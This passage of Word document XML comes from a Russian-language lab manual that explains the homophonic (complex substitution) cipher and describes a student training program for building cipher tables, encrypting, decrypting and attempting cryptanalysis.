        </w:rPr>
        <w:t>Рассмотрим схему действия метода сложной подстановки. На основе набранной статистики частоты повторения различных символов, характерной для той или иной предметной области, составляется таблица шифрования. Первый столбец этой таблицы состоит из всех символов исходного текста. Во втором столбце записываются символы, которыми символы исходного текста будут заменяться. В методе сложной подстановки каждый символ исходного текста заменяется одним или более символами. Поэтому если очередной символ заменяется более чем одним символом, то напротив него ставится несколько столбцов, содержащих символы замены (следует заметить, что каждый символ замены можно использовать только один раз, то есть если, например, символ "п" заменяет символ "а", то он больше не может заменять ни один другой символ).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Количество символов замены подбирается исходя из статистики частоты повторения символов, набранной до составления таблицы шифрования. Чем чаще встречается символ в исходном тексте, тем большим количеством символов его следует заменять. В идеальном случае частота повторения всех символов в тексте, зашифрованном методом сложной подстановки, должна быть одинаковой.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Таким образом, если символ "пробел" встречается чаще, чем другие символы, то при зашифровании текста его следует заменять наибольшим количеством символов: тремя, четырьмя или даже пятью (конкретное количество подбирается исходя из статистики).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>После всех действий мы получаем таблицу шифрования, на основании которой и производится шифрование.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Шифрование включает в себя </w:t>
      </w:r>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>зашифрование</w:t>
      </w:r>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, то есть перевод открытого текста в зашифрованный вид, и </w:t>
      </w:r>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>расшифрование</w:t>
      </w:r>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> – восстановление исходного текста по его зашифрованному представлению. Оба действия используют одну и ту же таблицу шифрования.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Зашифрование информации методом сложной подстановки производится следующим образом. Берется первый символ из шифруемого текста. В таблице шифрования отыскивается строка, начинающаяся с этого символа. В этой строке выбирается любой символ, стоящий справа от искомого (если их несколько, то случайным образом выбирается любой из них). Полученный символ и является шифром первого символа. Далее берется второй символ и с ним проделывается та же операция и так далее до тех пор, пока не будет зашифрован весь исходный текст. После замены каждого символом исходного текста на символ из таблицы шифрования мы получим зашифрованный текст.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Расшифрование происходит аналогичным образом с использованием той же самой таблицы шифрования. Выбирается первый символ зашифрованного текста. Этот символ ищется среди символов замены в таблице шифрования. Первый символ строки, в которой находится найденный символ, и будет символом исходного (расшифрованного) текста. Такая же операция проводится с каждым символом зашифрованного текста. После ее проведения над всеми символами зашифрованного текста получим расшифрованный текст.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Методика и порядок выполнения работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Работа имеет главное меню, состоящее из двух пунктов: «Помощь» и «Вернуться». При выборе пункта «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Помощь</w:t>
      </w:r>
      <w:r>
        <w:t>» появляется окно справки системы, в котором пользователь может получить начальные сведения о работы с системой. При выборе пункта меню «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Вернуться</w:t>
      </w:r>
      <w:r>
        <w:t>» пользователь выходит из программы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Меню выполнения состоит из четырех пунктов: «Теория», «Создание таблицы», «Практика» и «Дешифрование».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Закладка «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Теория</w:t>
      </w:r>
      <w:r>
        <w:t>» открывает текстовый файл, содержащий теоретический материал. Здесь описывается система шифрования методом сложной подстановки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>После изучения теории студент переходит к практической части. На первом этапе он должен составить таблицу шифрования. Для этого необходимо выбрать закладку «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Создание</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>таблицы</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">». </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Создание таблицы шифрования.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Эта закладка содержит меню, состоящее из семи пунктов: «Открыть файл», «Очистить все», «Сохранить в файл», «Зашифровать», «Статистика», «Расшифровать», «Применить».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>«Открыть файл»</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – этот пункт предназначен для загрузки исходного текста. Открывать можно незашифрованный текст и зашифровывать его, а так же открывать зашифрованный текст и расшифровывать его.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="32"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Для создания таблицы шифрования необходимо загрузить незашифрованный текст. При желании пользователь может создать исходный тест вручную с клавиатуры.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>«Сохранить в файл»</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - этот пункт меню предназначен для сохранения результатов, которые находятся в нижнем окне.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>«Очистить все»</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - этот пункт предназначен для очистки окон исходного текста и результатов работы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>«Зашифровать»</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - этот пункт предназначен для зашифрования исходного текста. При этом в верхнем окне редактирования должен содержаться незашифрованный исходный текст и при нажатии этой кнопки происходит его зашифрование по используемой таблице шифрования.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">«Расшифровать» </w:t>
      </w:r>
      <w:r>
        <w:t>- этот пункт предназначен для расшифрования исходного текста. При этом в верхнем окне редактирования должен содержаться зашифрованный исходный текст и при нажатии этой кнопки происходит его расшифрование по используемой таблице шифрования.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>При нажатии кнопки «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Статистика</w:t>
      </w:r>
      <w:r>
        <w:t>» происходит расчет частоты повторения символов, которыми производится зашифрование. Результат операции выводится в «Таблицу статистики», расположенную справа на экране.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>«Применить»</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - нажатие этой кнопки делает созданную таблицу текущей для программы. После нажатия этой кнопки старая таблица шифрования удаляется и начинает действовать новая.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Изменение таблицы шифрования.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>В исходном варианте (до внесения изменений студентом) таблица шифрования состоит из трех столбцов. Первый столбец ("Символ") содержит все символы шифруемого алфавита. Второй столбец ("Шифр 1") содержит символ алфавита замены, причем напротив каждого символа исходного алфавита стоит один символ из алфавита замены. Третий столбец – пустой. В исходном варианте каждый символ исходного алфавита зашифровывается одним символом алфавита шифрования.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Редактирование таблицы шифрования производится при помощи одного и того же всплывающего меню, состоящего из двух пунктов «Редактировать» и «Удалить». Выбор «Редактировать» приводит к показу списка свободных символов, выбор «Удалить» удаляет выбранный символ. В некоторых случаях пункты этого меню (или один из них) могут быть недоступны.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Для изменения символа замены необходимо на этом символе щелкнуть правой кнопкой мыши. При этом появится всплывающее меню, состоящее из двух пунктов «Редактировать» и «Удалить». Если выбрать пункт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>«Редактировать»</w:t>
      </w:r>
      <w:r>
        <w:t>, то появится список не используемых еще для замены символов. Если пользователю требуется, чтобы символ исходного алфавита зашифровывался несколькими символами, то необходимо выбрать пустую ячейку в строке заменяемого символа, стоящую за последним символом замены, и на ней щелкнуть правой кнопкой мыши. При этом появится всплывающее меню, в котором необходимо выбрать пункт «Редактировать», и далее из списка неиспользуемых символов необходимо выбрать символ замены, при этом он исчезнет в списке свободных символов для замены.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Если выбранная для редактирования ячейка была в столбце без заголовка (это всегда последний столбец в таблице), то у этого столбца появляется заголовок «Шифр №» (где № - это цифра, показывающая номер символа замены для выбранного символа исходного алфавита) и при этом добавится еще один столбец без заголовка. Вообще в таблице шифрования всегда присутствует последний пустой столбец (без заголовка и без содержания), который необходим для расширения таблицы шифрования. Это дает возможность составить </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>таблицу шифрования таким образом, чтобы зашифровывать очередной символ любым количеством символов из символов алфавита замены.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Шифрование</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Эта часть предназначена для получения практических навыков по зашифрованию и расшифрованию информации на основе созданной таблицы шифрования и оценки полученных навыков.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>В этом разделе можно работать в двух режимах: выполнять задание на оценку и задание без оценки. Задание без оценки служит для приобретения навыков по зашифрованию и расшифрованию информации методом сложной подстановки. Задание на оценку выполняется с целью контрольного тестирования по данному разделу.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>После того, как пользователь ввел результат (при этом он должен использовать таблицу шифрования, расположенную справа на этой закладке), необходимо нажать кнопку «Результат». После этого будет произведена проверка правильности ответа. Если пользователь нажмет кнопку «Результат», но при этом он не введет ни одного символа в поле для ввода результата, то появится сообщение о необходимости ввести результат.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Если ответ введен, но количество символов в строке задания не соответствует количеству символов в строке результата, то выдается сообщение о несовпадении количества символов. При выполнении задания на оценку эта проверка не влияет на саму оценку.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Если ответ введен правильно, то появится сообщение о вводе правильного ответа:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>После подтверждения пользователем данного сообщения в строке редактирования появляется новое задание на зашифрование строки. С этой строкой необходимо произвести аналогичные операции.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Если студент вводит неправильный ответ, то система выдает сообщение о вводе неправильного ответа:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>При этом студенту предлагается просмотреть правильный ответ. Данное сообщение имеет три варианта ответа. “Yes” – на экране появляется строка «Правильный ответ», которая содержит вариант правильного ответа (для продолжения выполнения заданий необходимо нажать кнопку «Следующий»). Если пользователь выбирает “No”, то сообщение исчезает с экрана и студент имеет возможность еще раз попробовать ввести правильный ответ. Если выбрана кнопка “Cancel”, то сообщение исчезает и пользователь получает следующее задание.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Задание на расшифрование происходит аналогичным образом, за исключением того, что красным шрифтом указано «Расшифровать строку» и в строке редактирования «Исходная строка» появляются задания на расшифрование.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Проведя тренировку на заданиях без оценки, студент может оценить свои знания, выполнив задание с оценкой. Для этого необходимо отметить флажок «с оценкой». После этого для начала выполнения задания следует нажать кнопку «Старт».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>«Дешифрование»</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Раздел «Дешифрование» имеет главное меню, состоящее всего из двух пунктов «Загрузить </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>текст» и «Дешифровать». Левую сторону формы занимают элементы для текста. В центре формы расположена таблица шифрования. Правая сторона формы – область получения помощи при дешифровании текста.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">При выборе пункта </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>«Загрузить текст»</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> автоматически выполняются следующие действия:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>а) создается случайным образом таблица шифрования (таблица скрыта от пользователя);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>б) происходит зашифрование текста по полученной таблице;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>с) загружается полученный текст в область «Зашифрованный текст».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>При выполнении операции загрузки текста появляется окно со строкой состояния выполнения задания, показывающее степень загрузки задания. При этом все остальные элементы программы становятся недоступными.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>После загрузки задания текст появляется в текстовой области «Зашифрованный текст». Текст доступен только для чтения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>После того как задание загружено, можно работать с пунктом меню «Дешифровать». При выборе этого пункта меню происходит дешифрование исходного текста на основании таблицы шифрования, расположенной в центре экрана. Дешифрованный текст помещается в текстовое поле «Дешифрованный текст», которое также доступно только для чтения. Если в зашифрованном тексте имеются символы, которые отсутствуют в таблице шифрования, то при дешифровании на их места (в поле дешифрованного текста) подставляются звездочки (*). Если задание не загружено, то при нажатии на кнопку «Дешифровать» ничего не происходит (текстовая область «Дешифрованный текст» остается без изменения).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>В центре экрана расположена таблица шифрования, которую можно изменять. Первоначально таблица имеет два заполненных столбца. В первом находятся символы исходного алфавита, во втором – символы замены. На первом этапе состояние этих столбцов одинаково. Для редактирования доступен любой столбец таблицы, кроме первого. Чтобы произвести редактирование символа, следует выделить этот символ в таблице и нажать правую кнопку мыши. При этом появится всплывающее меню, состоящее из трех пунктов: «Редактировать», «Удалить», «Символ отмечен».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
